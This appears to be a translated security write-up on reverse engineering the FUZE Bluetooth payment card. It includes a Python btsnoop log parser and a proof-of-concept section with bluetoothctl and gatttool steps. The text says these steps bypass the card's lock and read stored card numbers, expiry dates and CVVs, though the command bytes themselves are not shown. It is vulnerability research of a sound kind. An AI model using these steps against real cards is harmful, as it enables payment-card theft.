How to obtain credit card data using Bluetooth
FUZE Card Introduction
FUZE is an IoT device the same size as an ordinary credit card; it is programmed over Bluetooth from a smartphone app. To let users manage and configure their credit cards, BrilliantTS has also released an application called eCARD Manager. When you need to pay, you select the credit card to use in the mobile app; once the selection succeeds, the FUZE card behaves as the selected card.
However, research showed that the security of the card-adding and card-use process is not reliable. To a certain extent, FUZE does deploy some protection measures. When setting up FUZE for the first time you are asked to enter a six-digit passcode, but this step can be skipped. Once a passcode is configured, the device stays locked until you unlock it manually or your phone is near the card. While locked, the data on the card cannot be accessed and the magnetic strip cannot be programmed. There is also an advanced security mode in which the card can only be used while the user's phone is connected to it via Bluetooth.
X-ray scanning hardware structure
Unlike common IoT devices, the FUZE card is less than one millimeter thick, so optical scanning is the most suitable way to understand its internal structure. The scanned structure diagram is as follows:
We can see that the main chips are a microcontroller, an e-paper driver and a Bluetooth SoC. Many functions on the board are not yet used, including NFC and EMV (support for these will be provided later).
Bluetooth protocol reverse analysis
For the FUZE card, the Bluetooth interface is the main target of our reverse analysis. For this purpose, the tools I want to use are as follows:
1. An Android phone;
2. Burp Suite (optional);
3. Wireshark and a Perl script;
4. Gatttool/BlueZ;
If you want to black-box test Bluetooth devices, an Android phone is essential: not only can we capture Bluetooth traffic on the phone, we can also disassemble the app's Java bytecode directly. As an HTTP proxy, Burp can intercept API requests between the Android app and the backend servers. Android has a function called "Bluetooth HCI snoop log", which users can turn on in the developer settings menu. It saves all Bluetooth activity to a file, which contains every interaction between the app and the device. Wireshark can read the HCI snoop log and perform basic filtering and analysis on it. To semi-automate exporting the data to a text file, a Perl script is used here. Finally, gatttool or other BlueZ tools can be used to probe the device directly and understand the protocol messages.
Reverse FUZE
As we all know, BLE's pairing protocol is vulnerable, and most devices implement additional security protection on top of it. Likewise, FUZE does not send data to any device that has not paired with it and uses BLE connection-layer encryption. Therefore gatttool cannot send a request to FUZE without pairing, so I plan to use the Android-based reverse analysis method:
1. Turn on the Bluetooth HCI snoop function on Android;
2. Interact with the FUZE card in the App;
3. Use adb to export HCI logs to PC;
4. Use Wireshark for analysis;
5. Filter and export the data to text;
6. Use Perl script to parse the data;
The reverse analysis results of Wireshark are as follows:
The best thing about HCI snoop is that the data it captures is plaintext, recorded before the hardware Bluetooth chip encrypts it, so the log contains recognisable ASCII strings and the protocol's data formats.
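As an added example (not code from the article or from BrilliantTS), the following Python script does what the Perl step above does, but directly on the raw btsnoop_hci.log that Android writes, without going through Wireshark: it walks each record down to the ATT layer and lists write requests and notifications with their handle and value, which is exactly the plaintext that HCI snoop exposes. The byte layout follows the btsnoop and Bluetooth HCI/L2CAP/ATT specifications; the log it parses is constructed in memory, and the notification handle 0x001a is a hypothetical value.

```python
import struct

BTSNOOP_MAGIC = b"btsnoop\x00"
DATALINK_H4 = 1002            # btsnoop datalink code for HCI UART (H4) framing
H4_ACL = 0x02                 # H4 packet-type byte for ACL data
L2CAP_CID_ATT = 0x0004        # fixed L2CAP channel carrying ATT/GATT
# ATT opcodes whose PDU starts with a 2-byte handle followed by the value
ATT_WITH_HANDLE = {0x12: "Write Request", 0x52: "Write Command",
                   0x1B: "Handle Value Notification", 0x1D: "Handle Value Indication"}

def parse_btsnoop(blob):
    """Return (direction, opcode name, handle, value hex) for each ATT PDU in a btsnoop blob."""
    if blob[:8] != BTSNOOP_MAGIC:
        raise ValueError("not a btsnoop file")
    version, datalink = struct.unpack(">II", blob[8:16])
    if version != 1 or datalink != DATALINK_H4:
        raise ValueError("unsupported btsnoop version or datalink")
    pos, found = 16, []
    while pos + 24 <= len(blob):
        # record header: orig len, incl len, flags, cumulative drops, timestamp (big-endian)
        _orig, incl, flags, _drops, _ts = struct.unpack(">IIIIq", blob[pos:pos + 24])
        pkt = blob[pos + 24:pos + 24 + incl]
        pos += 24 + incl
        direction = "host->card" if (flags & 1) == 0 else "card->host"
        if flags & 2 or len(pkt) < 9 or pkt[0] != H4_ACL:
            continue                      # skip HCI commands/events and non-ACL traffic
        # after the H4 byte: ACL handle+flags (2), ACL length (2), L2CAP length (2), CID (2)
        l2_len, cid = struct.unpack("<HH", pkt[5:9])
        att = pkt[9:9 + l2_len]
        if cid != L2CAP_CID_ATT or len(att) < 3 or att[0] not in ATT_WITH_HANDLE:
            continue
        handle = struct.unpack("<H", att[1:3])[0]
        found.append((direction, ATT_WITH_HANDLE[att[0]], handle, att[3:].hex()))
    return found

def att_record(from_card, att_pdu):
    """Wrap an ATT PDU in L2CAP, ACL and btsnoop framing (used to build the constructed sample)."""
    l2cap = struct.pack("<HH", len(att_pdu), L2CAP_CID_ATT) + att_pdu
    acl = bytes([H4_ACL]) + struct.pack("<HH", 0x2040, len(l2cap)) + l2cap  # conn 0x40, first packet
    return struct.pack(">IIIIq", len(acl), len(acl), 1 if from_card else 0, 0, 0) + acl

# Constructed sample log: the CCCD write on handle 0x001b (value 0100) from the
# article, then a notification on a hypothetical value handle 0x001a.
SAMPLE_LOG = (BTSNOOP_MAGIC + struct.pack(">II", 1, DATALINK_H4)
              + att_record(False, bytes([0x12, 0x1B, 0x00, 0x01, 0x00]))
              + att_record(True, bytes([0x1B, 0x1A, 0x00]) + b"FUZE-sample"))

if __name__ == "__main__":
    for rec in parse_btsnoop(SAMPLE_LOG):
        print(rec)
```

To run it on a real capture, read btsnoop_hci.log as bytes (after pulling it with adb) and pass the contents to parse_btsnoop.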
Exploitation and PoC
Note: If an attacker can capture the pairing session between the device and the App, the numeric pairing PIN code of the FUZE card can be recovered by brute force.
First, we need to use bluetoothctl to scan the device and pair it with it:
1. Start bluetoothctl: sudo bluetoothctl;
2. Enable agent client (for pairing): agent on;
3. Scan for devices: scan on;
4. After the FUZE card is found, stop scanning: scan off;
5. Pair with FUZE card: pair
6. Enter the numeric PIN code displayed on the device;
7. Disconnect: disconnect
Next, we can use gatttool to send commands to the card:
1. Start gatttool: sudo gatttool -I -b
2. Connect device: connect;
3. Subscribe to notifications: char-write-req 1b 0100;
4. Send command: char-write-req 18
The command we sent is as follows:
The first command bypasses the device's lock-screen function; the next one reads the first credit card's number, expiration date and CVV stored on the device.
Summary
Apple Pay and Samsung Pay came first, and the FUZE smart card came later; the entire payment industry is trying hard to achieve cardless payment. Although I personally don't think Bluetooth credit cards have much practical value, since they already exist we must find ways to ensure their security.